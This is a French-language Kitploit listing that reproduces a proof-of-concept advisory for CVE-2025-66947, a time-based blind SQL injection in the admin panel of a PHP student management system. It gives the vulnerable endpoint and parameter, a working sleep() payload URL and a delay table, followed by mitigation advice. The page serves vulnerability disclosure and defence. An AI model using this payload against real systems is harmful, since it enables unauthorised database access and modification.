Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-66947 — Preuve de concept pour une injection SQL aveugle basée sur le temps dans un panneau d'administration PHP. Démontre l'exploitation via un paramètre GET non assaini, avec des conseils d'atténuation pour un usage défensif. | Kitploit
Outils/GitHubGitHub/kabir0104k/cve-2025-66947
Analyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHubkabir0104k/cve-2025-66947

CVE-2025-66947

Preuve de concept pour une injection SQL aveugle basée sur le temps dans un panneau d'administration PHP. Démontre l'exploitation via un paramètre GET non assaini, avec des conseils d'atténuation pour un usage défensif.

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-66947

Injection SQL aveugle basée sur le temps dans krishanmuraiji SMS v1.0

⏱️ Comparaison visuelle : réponse normale vs réponse retardée de ~6s

🔍 Résumé

TL;DR : Un paramètre GET dans un module d'administration permet une injection SQL basée sur le temps via des délais de réponse.

Une vulnérabilité d'injection SQL aveugle basée sur le temps existe dans krishanmuraiji SMS v1.0 en raison d'une validation inadéquate d'un paramètre GET dans un module d'administration.


🎯 Composant affecté

  • Fichier : /studentms/admin/edit-class-detail.php
  • Paramètre : editid (GET)
  • Problème : Entrée non assainie utilisée directement dans la requête SQL

🧪 Preuve de concept (PoC)

Étape 1 — Requête normale

/studentms/admin/edit-class-detail.php?editid=12

Étape 2 — Injecter la charge utile basée sur le temps

/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)

Résultat attendu

  • La réponse du serveur est retardée de ~6 secondes
  • Aucun message d'erreur visible
  • Le délai confirme l'injection SQL

⏱️ Vérification des délais

Charge utileDélai
sleep(3)~3s
sleep(6)~6s
sleep(15)~15s

Un délai constant = Injection SQL confirmée

📌 Où ce modèle apparaît

Ce modèle de vulnérabilité apparaît couramment dans :

  • Applications CRUD PHP
  • Systèmes de gestion d'étudiants / bibliothèque / inventaire
  • Panneaux d'administration qui font confiance aux paramètres GET numériques
  • Applications où les erreurs SQL sont désactivées

🛡️ Impact

  • Divulgation d'informations de la base de données
  • Modification non autorisée des données
  • Élévation de privilèges
  • Compromission de la base de données backend

🧠 Pourquoi c'est important

Même lorsque l'authentification est requise et que les erreurs sont masquées,
L'injection SQL basée sur le temps reste exploitable et dangereuse.

Sévérité : Élevée

🔧 Atténuation

  • Utiliser des requêtes préparées
  • Valider les paramètres numériques
  • Éviter la concaténation de requêtes SQL
  • Appliquer le principe du moindre privilège pour l'accès à la base de données

🆔 CVE

CVE-2025-66947

👤 Découvreur

Ranjan Kumar

⚠️ Avertissement

Cette preuve de concept est fournie à des fins éducatives et défensives uniquement.

CVE-2025-66947, Injection SQL, Injection SQL aveugle basée sur le temps, PHP, Panneau d'administration

Télécharger l’outil